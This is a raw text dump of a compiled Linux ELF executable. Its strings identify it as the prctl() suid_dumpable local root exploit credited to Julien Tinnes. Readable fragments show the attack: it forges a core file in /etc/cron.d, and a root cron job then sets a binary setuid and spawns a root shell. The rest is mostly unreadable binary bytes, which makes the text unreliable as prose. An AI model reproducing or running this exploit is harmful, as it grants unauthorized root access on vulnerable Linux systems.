ELF44 (444H H H HHH\ \\((( Qtd/lib/ld-linux.so.2GNU     Y<L?R Zb}FHw6l^86:68<r: .Q _Jv_RegisterClasses__gmon_start__libc.so.6geteuidsnprintfgetpidprctlexeclperrorreadlinksetrlimitsleepkillchdirsetgidsignalforkgettimeofdayexit_IO_stdin_used__libc_start_mainsetuidGLIBC_2.2GLIBC_2.0$ii ii $48<@DHLPT X \ ` d hlptx|Uq5,%0%4h%8h%<h%@h%Dh %Hh(%Lh0%Ph8p%Th@`%XhHP%\hP@%`hX0%dh` %hhh%lhp%phx%th%xh%|h1^PTRhh`QVh[_US[gRtX[ÐU=tvҡuÉUXtt hXЃvÐUjhhU)ua h@ j j-jhXhXt h`Ex hl6hhh\u hw hh<j uu h@E hhjB h bu hEjj"u, h h,=Ec hP!yPhohhhhhh E}v hE h0E}u h E}u jx[ j hŌaj uu h܌Eejh1u+E<Й}<)Ph jx hEEÐUWVS [ú E)19s׉M)F9Ήr [^_ÉUWVS[i ) pNu. [^_ÐUSRHH vЋuX[US[PY[[+] getting root shell /bin/sh[-] execle prctl() suidsafe exploit (C) Julien TINNES /proc/self/exe[-] readlinkThis is not fatal, rewrite the exploit [-] signal[+] Installed signal handler /etc/cron.d[-] chdir[-] prtctlIs you kernel version >= 2.6.13 ? [+] We are suidsafe dumpable! /etc/cron.d/core [-] cronstring is too small [+] Malicious string forged [-] fork[+] Segfaulting child [-] kill[+] Waiting for exploit to succeed (~%ld seconds) [-] It looks like the exploit failed $ < H` (oloo>\jzʅڅ *:JZjzT#/etc/cron.d/core suid_dumpable exploit SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin #%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d GCC: (GNU) 3.4.3 20041212 (Red Hat 3.4.3-9.EL4)GCC: (GNU) 3.4.3 20041212 (Red Hat 3.4.3-9.EL4)GCC: (GNU) 3.4.3 20041212 (Red Hat 3.4.3-9.EL4)GCC: (GNU) 3.4.3 20041212 (Red Hat 3.4.3-9.EL4)GCC: (GNU) 3.4.3 20041212 (Red Hat 3.4.3-9.EL4)GCC: (GNU) 3.4.3 20041212 (Red Hat 3.4.3-9.EL4).symtab.strtab.shstrtab.interp.note.ABI-tag.hash.dynsym.dynstr.gnu.version.gnu.version_r.rel.dyn.rel.plt.init.text.fini.rodata.eh_frame.ctors.dtors.jcr.dynamic.got.got.plt.data.bss.comment#(( 1HH7 p?``Go>>.Toll0c l  u<<pTT@{ 88 DD HH PP XX \\ $$((X @ &, (H`>l < T   8DHPX\$( H*P8XEIU܆ k wLTDX <\8 !Z1C< F[HlyB < H 6^H`R (4[ 9VHg r6 :H8(H<:.; OHewQ call_gmon_startcrtstuff.c__CTOR_LIST____DTOR_LIST____JCR_LIST__p.0completed.1__do_global_dtors_auxframe_dummy__CTOR_END____DTOR_END____FRAME_END____JCR_END____do_global_ctors_aux26-2.creadlink@@GLIBC_2.0execl@@GLIBC_2.0getpid@@GLIBC_2.0_DYNAMIC_fp_hwperror@@GLIBC_2.0fork@@GLIBC_2.0signal@@GLIBC_2.0shsetrlimit@@GLIBC_2.2__fini_array_end__dso_handle__libc_csu_finisetgid@@GLIBC_2.0crontemplatefname_initprctl@@GLIBC_2.0myrlimitte_startchdir@@GLIBC_2.0sleep@@GLIBC_2.0cronstring__fini_array_start__libc_csu_init__bss_startmain__libc_start_main@@GLIBC_2.0__init_array_enddata_startprintf@@GLIBC_2.0_finigettimeofday@@GLIBC_2.0__preinit_array_endsnprintf@@GLIBC_2.0exit@@GLIBC_2.0_edata_GLOBAL_OFFSET_TABLE__end__init_array_start_IO_stdin_usedkill@@GLIBC_2.0__data_start_Jv_RegisterClasses__preinit_array_startsetuid@@GLIBC_2.0geteuid@@GLIBC_2.0__gmon_start__